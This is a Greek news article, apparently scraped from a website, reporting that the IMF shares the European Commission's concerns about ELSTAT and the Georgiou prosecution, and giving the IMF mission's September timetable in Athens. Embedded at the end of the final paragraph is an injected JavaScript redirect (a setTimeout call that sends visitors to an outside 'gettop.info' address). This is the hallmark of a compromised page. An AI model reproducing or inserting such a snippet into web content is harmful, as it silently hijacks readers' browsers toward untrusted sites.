Το ΔΝΤ «μοιράζεται» της ανησυχίες της Κομισιόν για την ΕΛΣΤΑΤ

0
2

 

Τις ανησυχίες που διατύπωσε η Κομισιόν στην επιστολή της για την ΕΛΣΤΑΤ και την υπόθεση Γεωργίου συμμερίζεται το Διεθνές Νομισματικό Ταμείο, σύμφωνα με τον εκπρόσωπό του Τζέρι Ράις.
Με το τέλος του καλοκαιριού αρχίζουν και τα νέα βάσανα της ελληνικής οικονομίας αφού οι εκπρόσωποι των δανειστών «ακονίζουν τα μαχαίρια» τους επιστρέφοντας στην Αθήνα.
«Μοιραζόμαστε τις ανησυχίες που έχει εκφράσει η Κομισιόν, ότι πρόσφατες δηλώσεις κυβερνητικών στελεχών σε μέσα ενημέρωσης φαντάζουν να αμφισβητούν τα [στατιστικά] δεδομένα», δήλωσε ο εκπρόσωπος του Ταμείου, Τζέρι Ράις, μιλώντας σε δημοσιογράφους στην Ουάσιγκτον.

Το ΔΝΤ έχει επισημάνει στο παρελθόν ότι η ποιότητα των ελληνικών στατιστικών βελτιώθηκε από το 2010 – δηλαδή αφότου ανέλαβε καθήκοντα ο διωκόμενος πρώην επικεφαλής της ΕΛΣΤΑΤ Ανδρέας Γεωργίου. «Πιστεύουμε πως αυτή η πρόοδος θα πρέπει να διατηρηθεί», προσέθεσε με νόημα ο κ. Ράις.

Μάλιστα, ο εκπρόσωπος του ΔΝΤ σημείωσε πως στις επαφές με τις ελληνικές Αρχές το Ταμείο θα φροντίσει να διασφαλίσει ότι τα στοιχεία που του αναφέρονται είναι ακριβή, σε ένα έμμεσο μήνυμα πως το Ταμείο βάζει αστερίσκο στη στατιστική αξιοπιστία της ελληνικής πλευράς μετά την υπόθεση ΕΛΣΤΑΤ.

Επιστρέφει το ΔΝΤ στην Αθήνα

Με τα σημερινά δεδομένα και εκτός άλου απροόπτου, σύμφωνα με το mignatiou.com, η επικεφαλής της Αποστολής του ΔΝΤ Ντέλια Βελσκουλέσκου θα βρίσκεται στην Αθήνα στις 12 Σεπτεμβρίου με ομάδα συνεργατών της για τα προαπαιτούμενα της δανειακής δόσης των 2,8 δις ευρώ.

Στη συνέχεια, και συγκεκριμένα στις 19 του μήνα (μέχρις τις 26 Σεπτεμβρίου) αναμένεται να πραγματοποιηθεί η επισκόπηση για το άρθρο 4 του καταστατικού, που θα διαρκέσει μία ολόκληρη εβδομάδα. Στην βάση αυτής την επισκόπησης θα ξεκινήσει η νέα ανάλυση βιωσιμότητας του χρέους από το ΔΝΤ, που αναμένεται με αγωνία από την ελληνική κυβέρνηση. Πηγή εκτός του Ταμείου εκτίμησε ότι η ανάλυση αυτή θα ολοκληρωθεί έως τέλος χρόνου.

Η ίδια πηγή εκτίμησε ότι η δεύτερη αξιολόγηση του Προγράμματος που είναι προγραμματισμένη να αρχίσει στα μέσα Οκτωβρίου θα καθυστερήσει, αφού έγινε γνωστό στους δανειστές ότι από τα 15 προαπαιτούμενα έχει γίνει μόνο το ένα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here